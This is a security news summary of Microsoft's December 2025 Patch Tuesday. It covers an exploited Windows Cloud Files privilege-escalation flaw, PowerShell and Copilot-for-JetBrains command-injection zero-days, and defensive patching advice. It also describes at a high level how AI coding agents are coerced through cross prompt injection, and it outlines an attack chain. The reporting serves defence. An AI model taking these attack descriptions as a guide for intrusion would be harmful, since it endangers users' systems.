Microsoft Patches 56 Bugs, 1 Exploited and 2 Zero-Days

Microsoft closed 2025 with a December Patch Tuesday that fixes 56 vulnerabilities across Windows and related products, including one actively exploited flaw and two zero-days. Three issues are rated Critical and 53 are Important. The company also shipped 17 additional fixes for its Chromium-based Edge browser since November, including an iOS spoofing bug (CVE-2025-62223, CVSS 4.3).

By the numbers

• 56 total flaws: 3 Critical, 53 Important
• Types: 29 privilege escalation, 18 remote code execution, 4 information disclosure, 3 denial-of-service, 2 spoofing
• 2025 total: 1,275 CVEs patched, marking the second consecutive year over 1,000 and the third time ever

Actively exploited: CVE-2025-62221 (Windows Cloud Files Mini Filter)

• Type/score: Use-after-free, CVSS 7.8
• Impact: Local privilege escalation to SYSTEM
• Context: The Cloud Files minifilter is a core Windows component used by services like OneDrive, Google Drive, and iCloud
• Likely attack path: Low-privileged access (e.g., phishing, browser exploit, or another RCE) chained to CVE-2025-62221 for full host takeover; potential for domain-wide compromise when paired with credential theft
• Discovery: Credited to MSTIC and MSRC
• CISA KEV: Added to the Known Exploited Vulnerabilities catalog; U.S. FCEB agencies must patch by December 30, 2025

Two additional zero-days

• CVE-2025-54100 (CVSS 7.8): Command injection in Windows PowerShell allowing local code execution. Risk increases when users are socially engineered to run commands like Invoke-WebRequest that fetch crafted content.
• CVE-2025-64671 (CVSS 8.4): Command injection in GitHub Copilot for JetBrains enabling local code execution. Tied to broader IDE security research ("IDEsaster") highlighting risks from agentic IDE features and prompt-injection techniques.

AI/IDE security context

• Recent findings show multiple IDEs and AI tooling can be coerced via cross prompt injection, where LLM agents alter or generate prompts based on file contents or data from Model Context Protocol servers.
• Similar weaknesses were noted across tools including Kiro.dev, Cursor (CVE-2025-54131), JetBrains Junie (CVE-2025-59458), Gemini CLI, Windsurf, Roo Code (CVE-2025-54377, CVE-2025-57771, CVE-2025-65946), and GitHub Copilot for VS Code (rated Medium, no CVE).

What to do now

• Patch priority: Fast-track CVE-2025-62221 across Windows fleets; meet CISA deadlines if applicable
• PowerShell hardening: Restrict untrusted scripts, validate content sources, and monitor for suspicious Invoke-WebRequest usage
• Update IDEs and AI agents: Apply vendor updates, tighten "execute command" tooling, and review auto-approve lists and guardrails
• Browser hygiene: Update Microsoft Edge, including iOS builds, to address spoofing and other recent fixes
• Monitoring: Track CISA KEV entries and vendor advisories for evolving exploitation

Other vendors issuing fixes
Recent security updates also landed from Adobe, AWS, AMD, Arm, ASUS, Atlassian, Bosch, Broadcom (VMware), Canon, Cisco, Citrix, CODESYS, Dell, Devolutions, Django, Drupal, F5, Fortinet, Fortra, GitLab, Google (Android, Chrome, Cloud, Pixel, Pixel Watch), Hitachi Energy, HP, HPE (Aruba, Juniper), IBM, Imagination Technologies, Intel, Ivanti, Lenovo, major Linux distributions (AlmaLinux, Alpine, Amazon Linux, Arch, Debian, Gentoo, Oracle Linux, Mageia, Red Hat, Rocky Linux, SUSE, Ubuntu), MediaTek, Mitsubishi Electric, MongoDB, Moxa, Mozilla (Firefox, ESR), NVIDIA, OPPO, Progress Software, Qualcomm, React, Rockwell Automation, Samsung, SAP, Schneider Electric, Siemens, SolarWinds, Splunk, Synology, TP-Link, WatchGuard, Zoom, and Zyxel.

Source: The Hacker News